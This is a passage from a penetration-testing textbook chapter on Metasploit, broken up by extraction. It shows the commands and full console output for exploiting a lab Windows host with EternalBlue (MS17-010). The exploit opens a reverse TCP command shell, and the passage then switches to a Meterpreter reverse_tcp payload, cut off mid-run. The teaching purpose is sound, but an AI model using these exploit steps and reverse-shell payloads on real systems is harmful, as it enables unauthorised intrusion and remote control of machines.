| Chapter 6: Owning Metasploit

changed, although a fair number could be changed. You will see that the only option I
set before running the exploit is the remote host. You will also see the exploit runs
perfectly, and we get remote access to the system.
Example 6-7. Exploiting Metasploitable 3 with EternalBlue
msf exploit
(
windows/smb/ms17_010_eternalblue
)
> use exploit/windows/smb/
ms17_010_eternalblue
msf exploit
(
windows/smb/ms17_010_eternalblue
)
> 
set 
RHOST 192.168.86.48
RHOST
=
> 192.168.86.48
msf exploit
(
windows/smb/ms17_010_eternalblue
)
> exploit
[
*
]
Started reverse TCP handler on 192.168.86.21:4444
[
*
]
192.168.86.48:445 - Connecting to target 
for
exploitation.
[
+
]
192.168.86.48:445 - Connection established 
for
exploitation.
[
+
]
192.168.86.48:445 - Target OS selected valid 
for
OS indicated by SMB reply
[
*
]
192.168.86.48:445 - CORE raw buffer dump 
(
51
bytes
)
[
*
]
192.168.86.48:445 - 0x00000000
57
69
6e 
64
6f 
77
73
20
53
65
72
76
65
72
20
32
Windows Server 2
[
*
]
192.168.86.48:445 - 0x00000010
30
30
38
20
52
32
20
53
74
61
6e 
64
61
72
64
20
008
R2 Standard
[
*
]
192.168.86.48:445 - 0x00000020
37
36
30
31
20
53
65
72
76
69
63
65
20
50
61
63
7601
Service Pac
[
*
]
192.168.86.48:445 - 0x00000030 6b 
20
31
k 1
[
+
]
192.168.86.48:445 - Target arch selected valid 
for
arch indicated by DCE/RPC reply
[
*
]
192.168.86.48:445 - Trying exploit with 
12
Groom Allocations.
[
*
]
192.168.86.48:445 - Sending all but last fragment of exploit packet
[
*
]
192.168.86.48:445 - Starting non-paged pool grooming
[
+
]
192.168.86.48:445 - Sending SMBv2 buffers
[
+
]
192.168.86.48:445 - Closing SMBv1 connection creating free hole adjacent to
SMBv2 buffer.
[
*
]
192.168.86.48:445 - Sending final SMBv2 buffers.
[
*
]
192.168.86.48:445 - Sending last fragment of exploit packet!
[
*
]
192.168.86.48:445 - Receiving response from exploit packet
[
+
]
192.168.86.48:445 - ETERNALBLUE overwrite completed successfully 
(
0xC000000D
)
!
[
*
]
192.168.86.48:445 - Sending egg to corrupted connection.
[
*
]
192.168.86.48:445 - Triggering free of corrupted buffer.
[
*
]
Command shell session 
1
opened 
(
192.168.86.21:4444 -> 192.168.86.48:49273
)
at
2018-01-29 18:07:32 -0700
[
+
]
192.168.86.48:445 - 
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
[
+
]
192.168.86.48:445 - 
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-WIN-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
[
+
]
192.168.86.48:445 - 
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
Microsoft Windows 
[
Version 6.1.7601
]
Copyright 
(
c
)
2009
Microsoft Corporation. All rights reserved.
C:
\W
indows
\s
ystem32>
What you will notice from here is that we get a command prompt, just as if you were
to run 
cmd.exe
on a Windows system. You will be able to run any command in this
Exploiting Your Target | 183

session that you would be able to run there. This may be limited, though you can
launch PowerShell from this command interface. This will give you access to cmdlets
that can be used to manage the system and gather information from it.
In addition to running PowerShell, you can switch out the payload so you are using
Meterpreter instead. This gives us a set of functions that have nothing to do with the
operating system and any capabilities or limitations of the shell or command inter‐
preter we are presented. In 
Example 6-8
, I’m still using the EternalBlue exploit but
I’ve changed out the payload. This will return a Meterpreter shell instead of the com‐
mand interpreter.
Example 6-8. Exploiting EternalBlue to get Meterpreter
msf exploit
(
windows/smb/ms17_010_eternalblue
)
> 
set 
PAYLOAD
windows/x64/meterpreter/reverse_tcp
PAYLOAD
=
> windows/x64/meterpreter/reverse_tcp
msf exploit
(
windows/smb/ms17_010_eternalblue
)
> exploit
[
*
]
Started reverse TCP handler on 192.168.86.21:4444
[
*
]
192.168.86.48:445 - Connecting to target 

Download 22,59 Mb.